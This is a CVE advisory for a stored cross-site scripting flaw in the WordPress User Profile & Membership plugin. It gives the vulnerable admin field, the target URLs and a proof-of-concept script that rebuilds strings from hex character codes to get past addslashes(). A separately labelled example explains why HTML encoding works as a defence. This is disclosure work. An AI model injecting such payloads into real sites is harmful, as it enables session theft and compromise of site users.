CVE-2018-10234
[Suggested description]
Authenticated Cross-Site Scripting exists in the User Profile & Membership plugin before 2.0.11 for WordPress via the
"Account Deletion Custom Text"
input field on the wp-admin/admin.php?page=um_options&section=account page.
[Additional Information]
Because the stored value is run through addslashes(), a JavaScript payload that needs string literals has to build them without quote characters, e.g. from hex-encoded character codes:
<script>
// Rebuilds a string from an array of character codes without using quote
// characters, because addslashes() on the stored value would escape them.
function hex2a(hexx) {
    // str starts as the number 0 rather than an empty string literal, so the
    // payload contains no quotes; the leading 0 is sliced off at the end.
    var str = 0;
    for (var index = 0, len = hexx.length; index < len; ++index) {
        var hex = hexx[index].toString(16);
        for (var i = 0; i < hex.length; i += 2)
            str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
    }
    return str.slice(1);
}
var decode = [0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f]; // character codes for http://
var string = hex2a(decode);
alert(string);
</script>
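Added example (not part of this advisory or of the plugin's code): a JavaScript model of the two escaping steps involved, showing why addslashes() alone does not prevent stored XSS and what output encoding for an HTML context does instead. The addslashes() and escapeHtml() functions below reimplement the PHP semantics of addslashes() and htmlspecialchars() for illustration, and the sample strings are constructed.

```javascript
// Added example, not the plugin's code: addslashes() protects a quoted
// string context only; the stored option is later echoed into HTML, where
// entity encoding is the control that matters.

// Reimplementation of PHP addslashes(): backslash before ' " \ and NUL.
// Angle brackets and everything else pass through unchanged.
function addslashes(s) {
  return s.replace(/[\\'"\0]/g, function (c) {
    return c === '\0' ? '\\0' : '\\' + c;
  });
}

// HTML text-node encoding comparable to htmlspecialchars() with ENT_QUOTES
// (what WordPress esc_html() applies): no markup can be parsed from the result.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, function (c) { return map[c]; });
}

// True if the fragment still contains a raw HTML tag, meaning the browser
// would parse markup (and potentially script) out of supposedly plain text.
function containsRawTag(fragment) {
  return /<\/?[a-z][^>]*>/i.test(fragment);
}

// Constructed samples: ordinary admin text, and text carrying markup.
var benignText = "Are you sure? This can't be undone.";
var markupText = "<b>Goodbye</b>";

// addslashes() touches only the apostrophe in the benign text and leaves the
// markup sample exactly as entered; escapeHtml() neutralises the markup.
console.log(addslashes(benignText));
console.log(addslashes(markupText), containsRawTag(addslashes(markupText)));
console.log(escapeHtml(markupText), containsRawTag(escapeHtml(markupText)));
```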
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://ultimatemember.com/
[Affected Product Code Base]
User Profile & Membership plugin for WordPress - All versions < 2.0.11
[Affected Component]
User Profile & Membership plugin for WordPress
[Attack Type]
Local
[CVE Impact Other]
Stored Cross Site Scripting
[Attack Vectors]
Authenticated attackers could abuse the "Account Deletion Custom Text"
input field on the following page:
"http://<target>/wp-admin/admin.php?page=um_options&section=account"
to inject malicious JavaScript. Whenever a victim visits the page
"http://<target>/account/" to manage their account details, the
malicious JavaScript is executed in the browser of the WordPress
users/administrators.
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-10234